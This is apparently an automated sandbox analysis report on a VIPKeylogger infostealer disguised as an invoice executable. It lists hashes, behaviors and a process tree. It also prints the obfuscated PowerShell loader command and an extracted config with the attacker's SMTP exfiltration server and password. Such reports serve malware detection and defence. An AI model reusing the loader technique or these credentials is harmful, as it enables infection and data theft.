Analysis
-
max time kernel
147s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20250211-en -
resource tags
arch:x64arch:x86image:win10v2004-20250211-enlocale:en-usos:windows10-2004-x64system -
submitted
17/02/2025, 10:00
Static task
static1
Behavioral task
behavioral1
Sample
factura_2404047141_2024-09-17T02_00.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
factura_2404047141_2024-09-17T02_00.exe
Resource
win10v2004-20250211-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20250207-en
Behavioral task
behavioral5
Sample
Sightfulness.ps1
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
Sightfulness.ps1
Resource
win10v2004-20250211-en
General
-
Target
factura_2404047141_2024-09-17T02_00.exe
-
Size
686KB
-
MD5
5a38c30a54b3b6f72907b334a5ce8e1a
-
SHA1
568a123c1b4b5f8b09aef5603c19ceccb4b54850
-
SHA256
4a4bde620f7d6baf02442d09999d40123bfa471e99fcb53d3617132b678bb6cb
-
SHA512
719f1b1c287eceefbd56ab5527fa2ba623941f53ae83364ad247b6b9a6572fe12135584dffee46e9959d544f44904d437c1bf1ca252186409bef41cd9de55b80
-
SSDEEP
12288:7PCMC15K0rytFYPwzrjfa7LvgdtZ+/qb48R15Skemda90xTM:7CM8V+tuPmzaIdt4Ck8Lgkem1xQ
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
s46S2&4+ - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Downloads MZ/PE file 1 IoCs
flow pid Process 69 2240 Process not Found -
Loads dropped DLL 1 IoCs
pid Process 1632 factura_2404047141_2024-09-17T02_00.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2508704002-2325818048-3575902788-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2508704002-2325818048-3575902788-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2508704002-2325818048-3575902788-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 26 4664 msiexec.exe 28 4664 msiexec.exe 42 4664 msiexec.exe 44 4664 msiexec.exe 48 4664 msiexec.exe 52 4664 msiexec.exe 54 4664 msiexec.exe 66 4664 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 25 drive.google.com 26 drive.google.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 51 checkip.dyndns.org 53 reallyfreegeoip.org 54 reallyfreegeoip.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4664 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3504 powershell.exe 4664 msiexec.exe -
pid Process 3504 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language factura_2404047141_2024-09-17T02_00.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4744 MicrosoftEdgeUpdate.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 4664 msiexec.exe 4664 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3504 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 3504 powershell.exe Token: SeIncreaseQuotaPrivilege 3504 powershell.exe Token: SeSecurityPrivilege 3504 powershell.exe Token: SeTakeOwnershipPrivilege 3504 powershell.exe Token: SeLoadDriverPrivilege 3504 powershell.exe Token: SeSystemProfilePrivilege 3504 powershell.exe Token: SeSystemtimePrivilege 3504 powershell.exe Token: SeProfSingleProcessPrivilege 3504 powershell.exe Token: SeIncBasePriorityPrivilege 3504 powershell.exe Token: SeCreatePagefilePrivilege 3504 powershell.exe Token: SeBackupPrivilege 3504 powershell.exe Token: SeRestorePrivilege 3504 powershell.exe Token: SeShutdownPrivilege 3504 powershell.exe Token: SeDebugPrivilege 3504 powershell.exe Token: SeSystemEnvironmentPrivilege 3504 powershell.exe Token: SeRemoteShutdownPrivilege 3504 powershell.exe Token: SeUndockPrivilege 3504 powershell.exe Token: SeManageVolumePrivilege 3504 powershell.exe Token: 33 3504 powershell.exe Token: 34 3504 powershell.exe Token: 35 3504 powershell.exe Token: 36 3504 powershell.exe Token: SeDebugPrivilege 4664 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 1632 wrote to memory of 3504 1632 factura_2404047141_2024-09-17T02_00.exe 89 PID 1632 wrote to memory of 3504 1632 factura_2404047141_2024-09-17T02_00.exe 89 PID 1632 wrote to memory of 3504 1632 factura_2404047141_2024-09-17T02_00.exe 89 PID 3504 wrote to memory of 4664 3504 powershell.exe 100 PID 3504 wrote to memory of 4664 3504 powershell.exe 100 PID 3504 wrote to memory of 4664 3504 powershell.exe 100 PID 3504 wrote to memory of 4664 3504 powershell.exe 100 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2508704002-2325818048-3575902788-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2508704002-2325818048-3575902788-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\factura_2404047141_2024-09-17T02_00.exe"C:\Users\Admin\AppData\Local\Temp\factura_2404047141_2024-09-17T02_00.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Smergelpulveret=gc -Raw 'C:\Users\Admin\AppData\Local\Matens\Sexifid126\Sightfulness.Att';$Ationsprogrammet=$Smergelpulveret.SubString(52797,3);.$Ationsprogrammet($Smergelpulveret)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4664
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NzBCOUZGMkItRDQ3Qy00ODdGLTlEMTYtNjQ0RjlDMkQyNEY0fSIgdXNlcmlkPSJ7NTkyRDE1NTQtQjQwNi00MzJBLUE1QjgtQ0QyOEIxMjZBNUI1fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7NEMwN0M5OEEtNENDMS00QUZELUEyMUUtMTBFMkRFNzZEMzBBfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI1IiBpbnN0YWxsZGF0ZXRpbWU9IjE3MzkyODMyMzYiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4Mzc1NDI1MTE0ODAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1NDk2ODk0MjQzIi8-PC9hcHA-PC9yZXF1ZXN0Pg1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:4744
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
337KB
MD5c4e23e375e6d4f75a03bb4965d6cc3b3
SHA1475a3fa124557dc3163917305308c06450ad7e59
SHA25685a6aa4893d3267f7da12b7741a76cc82e98f91e7a34d518c74f41897a912638
SHA512c42ac641ab0b16a2c717ef7d09034d72a57eb7299e9ebb85e42482528a103c4a377c0ab9ae8a2fcd5e8ad1d2fd1e2897afaf270cafd85531b481bb49d032ade3
-
Filesize
51KB
MD556df3fc2932793899317cfeb62d64449
SHA1f9b092b5a1b1a127390596c69c45025c920958fc
SHA2561ba02a55786e074d96e3fc4c252b9ec86d6c50b76121692680fde2b15881d4f2
SHA512834b1bba8777a8b766e3214861ac9fc4850edb76ff9d225e01d79656dd373c206a2782ff4853ccb0c13e4271ac00733de2c46ed23e470007b3e480e8ed04cb3c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5b5a1f9dc73e2944a388a61411bdd8c70
SHA1dc9b20df3f3810c2e81a0c54dea385704ba8bef7
SHA256288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884
SHA512b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8